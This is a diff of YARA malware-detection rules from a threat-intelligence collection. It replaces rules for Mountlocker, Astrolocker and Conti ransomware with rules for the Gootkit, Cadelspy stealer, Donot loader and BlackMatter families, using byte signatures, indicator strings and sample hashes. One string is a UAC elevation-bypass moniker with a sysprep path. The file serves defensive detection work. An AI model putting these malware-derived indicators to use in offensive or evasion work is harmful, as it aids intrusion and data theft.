+		$seq2 = { 5a 00 3d 00 14 00 51 00 1f 00 67 00 1c 00 24 00 00 00 00 00 00 00 6f 00 27 00 62 00 5d 00 6d 00 30 00 01 00 27 01 25 00 62 00 7b 00 05 00 56 00 24 00 3c 00 3d 00 5d 00 2e 00 62 00 03 00 0a 00 57 00 6a 00 02 00 5d 00 02 01 23 01 67 00 20 00 54 00 01 00 6c 01 17 00 0b 00 44 00 21 00 1e 00 01 00 52 01 60 00 3b 00 11 00 45 00 2a 00 59 00 2c 00 19 00 00 00 5a 00 1e 00 61 00 5c 00 6b 00 31 00 01 00 1a 01 2d 00 4a 00 6f 00 11 00 57 00 2c 00 3a 00 3a 00 50 00 2a 00 61 00 02 00 07 00 53 00 7b 00 01 01 5b 00 02 01 6a 01 0b 00 03 00 6d 00 43 00 0c 00 64 00 4d 00 44 00 5f 00 08 00 5a 00 68 00 2b 00 32 00 68 }
 
 	condition:
-		filesize > 50KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 6 of ( $s* ) and 1 of ( $seq* )
 }
-rule ARKBIRD_SOLG_RAN_Mountlocker_May_2021_1 : FILE
+rule ARKBIRD_SOLG_Loa_JS_Gootkit_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect the Mountlocker ransomware"
+		description = "Detect JS loader used on the Gootkit killchain (November 2020)"
 		author = "Arkbird_SOLG"
-		id = "0bc0d341-4658-500e-b487-1993e5431560"
-		date = "2020-05-12"
-		modified = "2021-05-16"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-12/Astrolocker/RAN_MountLocker_May_2021_1.yara#L1-L20"
+		id = "649133bd-a44c-5d99-befa-0508fed27ed8"
+		date = "2020-11-21"
+		modified = "2020-11-21"
+		reference = "https://twitter.com/ffforward/status/1330214661577437187"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-21/Gootkit/Loa_JS_Gootkit_Nov_2020_1.yar#L1-L16"
 		license_url = "N/A"
-		logic_hash = "c0826d4c740b5c46b704b42e002602dd0cda2b6d1bf0ba5431877be8bd600b64"
+		logic_hash = "f24d31e7107b8c59b969481596a5e1369933bf2b0fa5117cd1aa5f7ea116d8d5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "0aa8099c5a65062ba4baec8274e1a0650ff36e757a91312e1755fded50a79d47"
-		hash2 = "f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963"
-		hash3 = "5eae13527d4e39059025c3e56dad966cf67476fe7830090e40c14d0a4046adf0"
-		tlp = "White"
-		adversary = "MountLocker"
+		hash1 = "7aec3ed791529182c0f64ce34415c3c705a79f3d628cbcff70c34a9f73d8ff42"
 
 	strings:
-		$seq_Sep_2020_1 = { 40 53 48 81 ec f0 02 00 00 b9 e8 03 00 00 ff 15 ec 1a 00 00 bb 68 00 00 00 48 8d 4c 24 70 44 8b c3 33 d2 e8 9c 00 00 00 ba 04 01 00 00 89 5c 24 70 48 8d 8c 24 e0 00 00 00 ff 15 51 1a 00 00 48 8d 15 a2 9c 00 00 48 8d 8c 24 e0 00 00 00 ff 15 64 1a 00 00 48 8d 44 24 50 45 33 c9 48 89 44 24 48 48 8d 94 24 e0 00 00 00 48 8d 44 24 70 45 33 c0 48 89 44 24 40 33 c9 48 83 64 24 38 00 48 83 64 24 30 00 c7 44 24 28 10 00 00 00 83 64 24 20 00 ff 15 c1 19 00 00 8b d8 85 c0 74 16 48 8b 4c 24 58 ff 15 50 1a 00 00 48 8b 4c 24 50 ff 15 45 1a 00 00 8b c3 48 81 c4 f0 02 }
-		$seq_Sep_2020_2 = { 68 00 00 00 f0 6a 01 68 a0 51 00 10 57 8d 45 f8 89 5d f4 50 89 7d f8 89 7d fc ff 15 30 50 00 10 85 c0 0f 84 81 00 00 00 8d 45 fc 50 57 57 68 14 01 00 00 68 d0 d0 00 10 ff 75 f8 ff 15 08 50 00 10 8b f0 85 f6 74 26 68 00 01 00 00 8d 45 f4 50 68 60 42 01 10 57 6a 01 57 ff 75 fc ff 15 04 50 00 10 ff 75 fc 8b f0 ff 15 00 50 00 10 57 ff 75 f8 ff 15 0c 50 00 10 }
-		$seq_Jan_2021_1 = { 48 21 4d 77 4c 8d 05 [2] 00 00 48 21 4d 6f ?? 8b ?? 48 8d 4d 77 [6-9] c7 44 24 20 00 00 00 f0 ff 15 [2] 00 00 85 c0 0f 84 [2] 00 00 48 8b 4d 77 48 8d 45 6f 48 89 44 24 28 48 8d [3] 00 00 83 64 24 20 00 [2-5] c9 41 b8 14 01 00 00 ff 15 [2] 00 00 8b d8 85 c0 74 3b 48 8b 4d 6f 48 8d 45 67 c7 44 24 30 00 01 00 00 45 33 c9 48 89 44 24 28 ?? 8b ?? 48 8d 05 [2-3] 00 33 d2 48 89 44 24 20 ff 15 [2] 00 00 48 8b 4d 6f 8b d8 ff 15 [2] 00 00 48 8b 4d 77 33 d2 ff 15 [2] 00 00 85 db [4-12] 00 00 48 8d }
-		$seq_Jan_2021_2 = { 4c 8d 05 20 47 00 00 41 8b ce 48 8d 15 1e 47 00 00 e8 [2] 00 00 ba 04 01 00 00 48 8d 4c 24 40 ff 15 ?? 43 00 00 85 c0 75 12 b8 5c 00 00 00 c7 44 24 40 43 00 3a 00 66 89 44 24 44 89 6c 24 38 4c 8d 8c 24 78 02 00 00 48 89 6c 24 30 48 8d 4c 24 40 48 89 6c 24 28 45 33 c0 33 d2 48 89 6c 24 20 66 89 6c 24 46 ff 15 6b 44 00 00 44 8b 84 24 78 02 00 00 48 8d 15 e4 45 00 00 85 c0 b9 bd 07 a2 41 44 0f 44 c1 41 8b c8 44 89 84 24 78 02 00 00 c1 c9 09 41 8b c0 89 4c 24 28 45 8b c8 c1 c8 06 48 8d 4c 24 40 41 c1 c9 03 89 44 24 20 ff 15 8b 44 00 00 4c 8d 44 24 40 33 d2 33 c9 ff 15 ?? 42 00 00 48 85 c0 74 1b ff 15 [2] 00 00 3d b7 00 00 00 74 0e bf 01 00 00 00 48 8d 15 fe 45 00 00 eb 09 8b fd 48 8d 15 a3 45 00 00 41 8b }
+		$s1 = { 7b [4-6] 5b [4-6] 5d 28 [4-6] 5b [4-6] 5d 29 28 [4-6] 5b [4-6] 5d 29 3b 7d }
+		$s2 = { 7b 72 65 74 75 72 6e 20 [4-6] 20 25 20 28 [4-6] 2b [4-6] 29 3b 7d }
+		$s3 = { 7b [4-6] 20 3d 20 [4-6] 28 [4-6] 29 2e 73 70 6c 69 74 28 [4-6] 29 3b 7d }
+		$s4 = { 7b 72 65 74 75 72 6e 20 [4-6] 2e 63 68 61 72 41 74 28 [4-6] 29 3b 7d}
+		$s5 = { 7b [4-6] 5b [4-6] 5d 20 3d 20 [4-6] 5b [4-6] 5b [4-6] 5d 5d 3b 7d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 1 of ( $seq* )
+		filesize > 1KB and 2 of them
 }
-rule ARKBIRD_SOLG_RAN_Astrolocker_May_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Cadelspy_Stealer_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect the Astrolocker ransomware"
+		description = "Detect Cadelspy stealer"
 		author = "Arkbird_SOLG"
-		id = "f2c2c96a-277e-575b-8d80-4729f4a1cfe4"
-		date = "2020-05-12"
-		modified = "2021-05-16"
+		id = "bac23ed9-f51c-546e-8f4e-320d33b51829"
+		date = "2021-05-30"
+		modified = "2021-06-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-12/Astrolocker/RAN_Astrolocker_May_2021_1.yara#L1-L18"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-30/APT39/MAL_Cadelspy_Stealer_May_2021_1.yara#L1-L24"
 		license_url = "N/A"
-		logic_hash = "7e50642f5f864b7cffeb5ccf4581ac7566da24fd5361a3303a860f036cd6d439"
-		score = 50
+		logic_hash = "29fade3703c55bd16e67f9bf126cb0d8a06bc0eafe10e145f8d57d8c4abe5656"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "7fe1686f4afb9907f880a5e77bf30bc00fae71980f57ca70b60b7b1716456a2f"
-		hash2 = "b26749b17ca691328ba67ee49d4d9997c101966c607ab578afad204459b7bf8f"
+		hash1 = "8847a73bbd9477be60685ce8ec8333db933892f4d7b729fcef01ac76600de9ff"
+		hash2 = "f3b0ad96c8529399bd7117bd67cdf0297191476d3a81a60b147960306ae5f068"
+		hash3 = "88c947d0d0fddd1ea87f5b85982cf231c9c56e4f5e25fac405f608a1c28d8391"
 		tlp = "White"
-		adversary = "-"
-		level = "Experimental"
+		adversary = "APT39"
 
 	strings:
-		$seq_Mar_2021_1 = { 6a 00 6a 00 ff 15 88 60 41 00 81 3d cc e6 b8 02 57 0f 00 00 8b 0d b4 c4 41 00 8b 15 b8 c4 41 00 a1 bc c4 41 00 89 4c 24 2c 89 54 24 20 89 44 24 24 75 14 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 28 60 41 00 8b 2d a8 60 41 00 c7 44 24 1c 20 00 00 00 8d 9b 00 00 00 00 8b 54 24 18 8b ce c1 e1 04 03 4c 24 20 8b c6 c1 e8 05 89 4c 24 14 8d 0c 32 89 44 24 10 8b 44 24 24 01 44 24 10 31 4c 24 14 81 3d cc e6 b8 02 f5 03 00 00 c7 05 0c da b8 02 36 06 ea e9 75 08 6a 00 ff 15 5c 60 41 00 8b 4c 24 14 31 4c 24 10 83 3d cc e6 b8 02 42 75 30 6a 00 6a 00 6a 00 ff d5 6a 30 8d 54 24 3c 6a 00 52 c7 44 24 40 00 00 00 00 e8 5a 5e ff ff 83 c4 0c 6a 00 8d 44 24 38 50 6a 00 ff 15 00 60 41 00 2b 5c 24 10 8b cb c1 e1 04 81 3d cc e6 b8 02 8c 07 00 00 89 4c 24 14 75 09 6a 00 6a 00 e8 d2 eb fe ff }
-		$seq_Apr_2021_1 = { 89 44 24 38 48 8b 05 78 4e 00 00 48 89 05 b9 9e 00 00 48 8b 05 52 4e 00 00 48 89 05 b3 9e 00 00 48 8b 05 4c 4e 00 00 48 89 05 ad 9e 00 00 48 8b 05 46 4e 00 00 48 89 05 a7 9e 00 00 8b 05 51 9e }
+		$str1 = "C:\\Windows\\SysEvent.exe" fullword wide
+		$str2 = "\\sysprep\\sysprep.exe" fullword wide
+		$str3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
+		$str4 = "@C:\\Windows\\systemw.dll" fullword wide
+		$str5 = "systemw.dll" fullword ascii
+		$str6 = "ApAshell32.dll" fullword wide
+		$seq1 = { 55 8b ec 83 ec 14 a1 04 00 41 00 33 c5 89 45 fc 8d 45 f8 c7 45 f0 00 00 00 00 50 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 68 20 02 00 00 6a 20 6a 02 8d 45 f0 66 c7 45 f4 00 05 50 ff 15 08 30 40 00 85 c0 74 25 8d 45 ec 50 ff 75 f8 6a 00 ff 15 04 30 40 00 ff 75 f8 f7 d8 1b c0 21 45 ec ff 15 00 30 40 00 83 7d ec 00 75 05 e8 52 fd ff ff 56 68 2d 02 00 00 ff 15 30 30 40 00 68 1c 33 40 00 ff 15 20 30 40 00 6a 00 6a 00 6a 01 6a 00 6a 00 6a 02 68 1c 33 40 00 89 45 f8 ff 15 1c 30 40 00 6a 00 8b f0 8d 45 f8 50 68 00 ba 00 00 68 68 33 40 00 56 ff 15 6c 30 40 00 56 ff 15 74 30 40 00 6a 01 6a 00 6a 00 68 1c 33 40 00 68 4c 33 40 00 6a 00 ff 15 b0 30 40 00 8b 4d fc 33 c0 33 cd 5e e8 06 00 00 00 }
+		$seq2 = { 8b 0d 10 32 40 00 0f 10 05 24 32 40 00 89 08 8b 0d 14 32 40 00 89 48 04 8b 0d 18 32 40 00 89 48 08 8b 0d 1c 32 40 00 89 48 0c 66 8b 0d 20 32 40 00 66 89 48 10 33 c9 a1 3c 32 40 00 0f 11 84 24 34 04 00 00 89 84 24 4c 04 00 00 f3 0f 7e 05 34 32 40 00 66 0f d6 84 24 44 04 00 00 0f 1f 40 00 0f b7 84 0c c8 0f 00 00 8d 49 02 66 89 84 0c 42 08 00 00 66 85 c0 75 e8 8d bc 24 44 08 00 00 83 c7 fe 66 8b 47 02 83 c7 02 66 85 c0 75 f4 b9 0a 00 00 00 be 40 32 40 00 f3 a5 b9 21 00 00 00 0f 10 05 58 33 40 00 66 a5 8d bc 24 54 0c 00 00 be 70 32 40 00 f3 a5 66 a5 0f 11 84 24 5c 0e 00 00 0f 10 05 78 ed 40 00 0f 11 84 24 6c 0e 00 00 0f 10 05 68 ed 40 00 0f 11 84 24 7c 0e 00 00 38 45 08 75 1f 8d 44 24 10 50 e8 23 fa ff ff 5f 5e 5b 8b 8c 24 c8 11 00 00 33 cc e8 1c 04 00 00 8b }
+		$seq3 = { 8b 84 b5 e4 d9 ff ff 85 c0 74 66 50 6a 00 68 ff ff 1f 00 ff 15 28 30 40 00 8b f8 85 ff 74 52 8d 85 dc d9 ff ff 50 6a 04 8d 85 d0 d9 ff ff 50 57 ff 15 64 30 40 00 85 c0 74 32 68 04 01 00 00 8d 85 ec fb ff ff 50 ff b5 d0 d9 ff ff 57 ff 15 34 30 40 00 8d 85 ec fb ff ff 68 f8 32 40 00 50 ff 15 38 31 40 00 83 c4 08 85 c0 74 21 57 ff d3 33 ff 8b 85 e0 d9 ff ff 46 c1 e8 02 8b cf 3b f0 0f 82 7b ff ff ff 85 c9 0f 84 43 01 00 00 68 04 01 00 00 8d 85 e4 f9 ff ff 50 6a 00 ff 15 3c 30 40 00 85 c0 0f 84 24 01 00 00 8d 85 f4 fd ff ff 50 68 04 01 00 00 ff 15 14 30 40 00 8d 85 f4 fd ff ff 50 6a 00 68 14 33 40 00 50 ff 15 60 30 40 00 6a 00 8d 85 f4 fd ff ff 50 8d 85 e4 f9 ff ff 50 ff 15 58 30 40 00 85 c0 0f 84 df 00 00 00 6a 00 6a 00 6a 03 6a 00 6a 00 68 00 00 00 c0 8d 85 f4 fd ff ff 50 ff 15 1c 30 40 00 8b f0 83 fe ff 0f 84 b8 00 00 00 6a 00 8d 85 d8 d9 ff ff 50 68 00 10 00 00 8d 85 e4 e9 ff ff 50 56 ff 15 78 30 40 00 85 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 1 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 5 of ( $str* ) and 2 of ( $seq* )
 }
-rule ARKBIRD_SOLG_Ran_Conti_Loader_V3_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_MAL_Donot_Loader_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect Conti V3 loader"
+		description = "Detect loader malware used by APT Donot for drops the final stage"
 		author = "Arkbird_SOLG"
-		id = "9541b9f8-befe-5bf4-88ee-b1cc5e92f927"
-		date = "2020-12-15"
-		modified = "2020-12-15"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-15/Conti/Ran_Conti_V3_Nov_2020_1.yar#L1-L22"
+		id = "ec4cac12-529f-56d2-bbc0-5fe30424b10b"
+		date = "2020-06-22"
+		modified = "2020-06-22"
+		reference = "https://twitter.com/ccxsaber/status/1274978583463649281"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-22/APT_MAL_Donot_Loader_June_2020_1.yar#L3-L22"
 		license_url = "N/A"
-		logic_hash = "c3c8530e1963c5af8ee93a5d2cc222abbeb3fb7e82ef6de2068795a38dca67aa"
-		score = 50
-		quality = 71
+		logic_hash = "986deffd48c1fb707948b00e1e200fa6538d4c73a32ab89f5119403f9bf0d734"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		level = "experimental"
-		hash1 = "707b752f6bd89d4f97d08602d0546a56d27acfe00e6d5df2a2cb67c5e2eeee30"
-		hash2 = "26b2401211769d2fa1415228b4b1305eeeed249a996d149ad83b6fc9c4f703ce"
+		hash1 = "1ff33d1c630db0a0b8b27423f32d15cc9ef867349ac71840aed47c90c526bb6b"
 
 	strings:
-		$seq1 = { 83 ec 1c 68 80 00 00 00 68 54 21 40 00 ff 15 30 20 40 00 85 c0 0f 85 e9 00 00 00 56 57 68 48 21 40 00 89 44 24 14 89 44 24 10 c7 44 24 1c 17 00 00 00 c7 44 24 20 55 1e 00 00 c7 44 24 24 09 04 00 00 ff 15 34 20 40 00 8b 3d 3c 20 40 00 8b f0 68 34 21 40 00 56 ff d7 68 20 21 40 00 56 a3 e4 33 40 00 ff d7 a3 0c 36 40 00 8d 44 24 14 50 6a 03 8d 4c 24 20 51 68 00 00 40 00 ff 15 e4 33 40 00 85 c0 7c 1a 8b 4c 24 14 8d 54 24 0c 52 8d 44 24 14 50 51 68 00 00 40 00 ff 15 0c 36 40 00 68 18 21 40 00 ff 15 70 20 40 00 8b 54 24 10 83 c4 04 50 68 00 10 00 00 52 6a 00 ff 15 38 20 40 00 8b 4c 24 10 8b f0 8b 44 24 0c 50 51 56 e8 4a 00 00 00 8d 54 24 14 52 }
-		$seq2 = { 8b 4c 24 24 8d 44 24 20 50 51 56 e8 1d fe ff ff 83 c4 24 ff d6 8b 54 24 28 5f 89 15 08 36 40 00 5e 33 c0 83 c4 }
-		$s1 = { 3e 35 44 35 4c 35 53 35 58 35 5e 35 64 35 6c 35 72 35 79 35 }
-		$s2 = { 31 07 32 0d 32 25 32 2b 32 30 32 36 32 4c 32 6a 32 }
-		$s3 = "_invoke_watson" fullword ascii
-		$s4 = { 8b 2d bc 36 40 00 0f b6 04 2f 0f b6 da 8b 54 24 14 0f b6 14 13 8d 0c 2f 03 d6 03 c2 99 be 40 03 00 00 f7 fe 0f b6 f2 8d 04 2e e8 7f ff ff ff 8d 43 01 99 f7 7c 24 18 47 81 ff 40 }
+		$s1 = "C:\\Users\\spartan\\Documents\\Visual Studio 2010\\new projects\\frontend\\Release\\test.pdb" fullword ascii
+		$s2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Edg/81.0.416.68" fullword ascii
+		$s3 = "bbLorkybbYngxkjbb]khbbmgvjgz4k~k" fullword ascii
+		$s4 = "8&8-8X8.959?9Q9h9v9|9" fullword ascii
+		$s5 = "0$0h4h5l5p5t5x5|5" fullword ascii
+		$s6 = "?&?+?1?7?M?T?g?z?" fullword ascii
+		$s7 = "12.02.1245" fullword ascii
+		$s8 = ">>?C?L?[?~?" fullword ascii
+		$s9 = "6*6=6P6b6" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and all of ( $seq* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 7 of them
 }
-rule ARKBIRD_SOLG_Ran_Conti_V3_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_Blackmatter_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect Conti V3 ransomware"
+		description = "Detect BlackMatter ransomware"
 		author = "Arkbird_SOLG"
-		id = "89702af3-664a-5c4a-8d2b-f195f5dddb6f"
-		date = "2020-12-15"
-		modified = "2020-12-15"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-15/Conti/Ran_Conti_V3_Nov_2020_1.yar#L24-L43"
+		id = "eb308cde-af92-5b34-b256-88009f90810f"
+		date = "2021-08-02"
+		modified = "2021-08-02"
+		reference = "https://twitter.com/abuse_ch/status/1421834305416933376"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-01/Blackmatter/RAN_BlackMatter_Aug_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "2c8f2fd9b155bb4fdb1304b4d7f683bc679780d079d8bbe4fb308f94769f1392"
+		logic_hash = "ff158ce977eb10f36c9e8a032dd3880fcd5ecc09e9cc07cd27b98bbce5661d75"
 		score = 50
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		level = "experimental"
-		hash1 = "f092b985b75a702c784f0936ce892595b91d025b26f3387a712b76dcc3a4bc81"
-		hash2 = "35ccc2b71567570bcac62e2f268faca50fa95fad6ac69e74f40856eb8f9ab03d"
+		hash1 = "22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6"
+		hash2 = "7f6dd0ca03f04b64024e86a72a6d7cfab6abccc2173b85896fc4b431990a5984"
+		level = "Experimental"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$seq1 = { 45 8c 00 8d 4d 8c c6 45 8d 7e c6 45 8e 4c c6 45 8f 0e c6 45 90 2c c6 45 91 4d c6 45 92 57 c6 45 93 13 c6 45 94 5d c6 45 95 08 c6 45 96 4c c6 45 97 77 c6 45 98 77 89 85 54 ff ff ff c6 45 99 6e 8a 45 8d e8 9f 0b 00 00 6a 6b 68 a8 21 3d be ba 0f 00 00 00 8b f0 e8 3c 3e 00 00 83 c4 08 56 ff d0 c6 45 f4 00 c6 45 f5 5a c6 45 f6 49 c6 45 f7 4c c6 45 f8 0b c6 45 f9 0b c6 45 fa 66 c6 45 fb 4c c6 45 fc 0b c6 45 fd 0b c6 45 fe 3f 89 85 50 ff ff ff 8a 45 f5 80 7d f4 00 75 2b 33 c9 66 0f 1f 84 00 00 00 00 00 8a 44 0d f5 0f b6 c0 83 e8 3f 6b c0 25 99 f7 fb 8d 42 7f 99 f7 fb 88 54 0d f5 41 83 f9 0a 72 e0 6a 6b 68 a8 21 3d be ba 0f 00 00 00 e8 bf 3d 00 00 83 c4 08 8d 4d f5 51 ff d0 c6 85 7c ff ff ff 00 8d 8d 7c ff ff ff c6 85 7d ff ff ff 48 c6 85 7e ff ff ff 17 c6 85 7f ff ff ff 3c c6 45 80 71 c6 45 81 3c c6 45 82 37 c6 45 83 57 c6 45 84 71 c6 45 85 0a c6 45 86 67 c6 45 87 12 c6 45 88 12 89 85 3c }
-		$seq2 = { 6c ff ff ff 00 8d 8d 6c ff ff ff c6 85 6d ff ff ff 02 c6 85 6e ff ff ff 17 c6 85 6f ff ff ff 72 c6 85 70 ff ff ff 3a c6 85 71 ff ff ff 16 c6 85 72 ff ff ff 73 c6 85 73 ff ff ff 10 c6 85 74 ff ff ff 78 c6 85 75 ff ff ff 1c c6 85 76 ff ff ff 00 c6 85 77 ff ff ff 39 c6 85 78 ff ff ff 39 89 85 48 ff ff ff c6 85 79 ff ff ff 71 8a 85 6d ff ff ff e8 1d 08 00 00 6a 6b 68 a8 21 3d }
-		$seq3 = { 8b d9 89 9d b8 fd ff ff c7 85 d4 fd ff ff 0b 01 00 00 c7 85 d8 fd ff ff 0b 02 00 00 c6 85 c4 fd ff ff 00 c6 85 c5 fd ff ff 19 c6 85 c6 fd ff ff 0d c6 85 c7 fd ff ff 27 c6 85 c8 fd ff ff 1f c6 85 c9 fd ff ff 0d c6 85 ca fd ff ff 1b c6 85 cb fd ff ff 28 c6 85 cc fd ff ff 26 c6 85 cd fd ff ff 1e c6 85 ce fd ff ff 0b c6 85 cf fd ff ff 1b c6 85 d0 fd ff ff 1b 8d 8d c4 fd ff ff c6 85 d1 fd }
-		$seq4 = { c6 85 00 ff ff ff 00 c6 85 01 ff ff ff 4b c6 85 02 ff ff ff 1f c6 85 03 ff ff ff 35 c6 85 04 ff ff ff 1f c6 85 05 ff ff ff 23 c6 85 06 ff ff ff 1f c6 85 07 ff ff ff 68 c6 85 08 ff ff ff 1f c6 85 09 ff ff ff 38 c6 85 0a ff ff ff 1f c6 85 0b ff ff ff 10 c6 85 0c ff ff ff 1f c6 85 0d ff ff ff 66 c6 85 0e ff ff ff 1f c6 85 0f ff ff ff 2a c6 85 10 ff ff ff 1f c6 85 11 ff ff ff 43 c6 85 12 ff ff ff 1f c6 85 13 ff ff ff 23 c6 85 14 ff ff ff 1f c6 85 15 ff ff ff 10 c6 85 16 ff ff ff 1f c6 85 17 ff ff ff 07 c6 85 18 ff ff ff 1f c6 85 19 ff ff ff 51 c6 85 1a ff ff ff 1f c6 85 1b ff ff ff 1c c6 85 1c ff ff ff 1f c6 85 1d ff ff ff 43 c6 85 1e ff ff ff 1f c6 85 1f ff ff ff 10 c6 85 20 ff ff ff 1f c6 85 21 ff ff ff 61 c6 85 22 ff ff ff 1f c6 85 23 ff ff ff 74 c6 85 24 ff ff ff 1f c6 85 25 ff ff ff 41 c6 85 26 ff ff ff 1f c6 85 27 ff ff ff 10 c6 85 28 ff ff ff 1f c6 85 29 ff ff ff 59 c6 85 2a ff ff ff 1f c6 85 2b ff ff ff 43 c6 85 2c ff ff ff 1f c6 85 2d ff ff ff 38 c6 85 2e ff ff ff 1f c6 85 2f ff ff ff 2b c6 85 30 }
+		$s1 = { 55 8b ec 81 ec ac 02 00 00 53 51 52 56 57 c7 45 fc 00 00 00 00 c7 45 f4 00 00 00 00 c7 45 f0 00 00 00 00 c7 45 ec 00 00 00 00 6a 00 ff 15 00 15 41 00 85 c0 0f 85 3e 04 00 00 8d 45 d4 50 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 84 15 41 00 85 c0 0f 85 1c 04 00 00 8d 85 7c ff ff ff c7 00 b1 5f 5a 22 c7 40 04 c8 5f 75 22 c7 40 08 b1 5f 06 22 b9 03 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8b 7d 08 8b 4d d4 8d 45 f8 50 6a 00 6a 00 6a 00 6a 00 6a 02 ff 71 1c ff 15 88 15 41 00 85 c0 75 6d 8d 45 dc 50 6a 00 6a 00 ff 75 f8 ff 15 8c 15 41 00 85 }
+		$s2 = { 8d 45 88 c7 00 a1 5f 42 22 c7 40 04 ac 5f 56 22 c7 40 08 d7 5f 29 22 c7 40 0c c2 5f 45 22 c7 40 10 a3 5f 3b 22 c7 40 14 ae 5f 69 22 c7 40 18 80 5f 76 22 c7 40 1c 98 5f 72 22 c7 40 20 88 5f 74 22 c7 40 24 9e 5f 2a 22 c7 40 28 ed 5f 06 22 b9 0b 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 88 50 8d 85 54 fd ff ff 50 ff 15 dc 12 41 00 83 c4 08 ff 75 cc 8d 85 54 fd ff ff 50 ff 15 d8 12 41 00 83 c4 08 8d 45 ec 50 8d 85 5c ff ff ff 50 6a 01 6a 00 6a 00 8d 85 54 fd ff ff 50 ff 15 98 15 41 00 }
+		$s3 = { 8d 45 b4 c7 00 21 0a 83 e9 c7 40 04 c5 ce d7 33 c7 40 08 40 c4 06 e2 c7 40 0c a2 87 fb dd b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 a4 c7 00 6a f9 14 fe c7 40 04 92 2c c9 33 c7 40 08 65 12 06 88 c7 40 0c ed 14 28 06 b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 94 c7 00 75 39 4d 45 c7 40 04 7f b1 d6 33 c7 40 08 40 2e 06 e2 c7 40 0c a2 87 fb dd b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 84 c7 00 99 f9 aa 66 c7 40 04 11 b7 d6 33 c7 40 08 4d 23 06 e2 c7 40 0c a2 e9 8e 02 b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 85 b8 fe ff ff c7 00 b2 5f 59 22 c7 40 04 bd 5f 74 22 c7 40 08 82 5f 70 22 c7 40 0c 84 5f 62 22 c7 40 10 88 5f 74 22 c7 40 14 ac 5f 74 22 c7 40 18 8e 5f 6e 22 c7 40 1c 84 5f 72 22 c7 40 20 88 5f 65 22 c7 40 24 99 5f 73 22 c7 40 28 9f 5f 63 22 c7 40 2c ed 5f 06 22 b9 0c 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 85 6c ff ff ff c7 00 bf 5f 49 22 c7 40 04 a2 5f 52 22 c7 40 08 b1 5f 45 22 c7 40 0c a4 5f 4b 22 c7 40 10 bb 5f 34 22 c7 40 14 ed 5f 06 22 b9 06 00 00 }
+		$s4 = { 8d bd fc fe ff ff 32 c0 aa b9 2a 00 00 00 b0 ff f3 aa b0 3e aa b9 03 00 00 00 b0 ff f3 aa b0 3f aa b9 0a 00 00 00 b0 34 aa fe c0 e2 fb b9 03 00 00 00 b0 ff f3 aa 32 c0 aa b9 03 00 00 00 b0 ff f3 aa }
+		$s5 = { 35 35 35 4f 35 58 35 22 36 35 36 3f 36 2c 37 3f 37 60 37 76 37 }
+		$s6 = { 3d 2b 3d 47 3d 4d 3d 60 3d 67 3d 6d 3d }
+		$s7 = { 8b 0e 0f b6 d1 0f b6 dd 57 8d bd fc fe ff ff 8a 04 3a 8a 24 3b c1 e9 10 83 c6 04 0f b6 d1 0f b6 cd 8a 1c 3a 8a 3c 39 5f 8a d4 8a f3 c0 e0 02 c0 eb 02 c0 e6 06 c0 e4 04 c0 ea 04 0a fe 0a c2 0a e3 88 07 88 7f 02 88 67 01 ff 4d fc }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and all of ( $seq* )
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and 5 of ( $s* )
 }
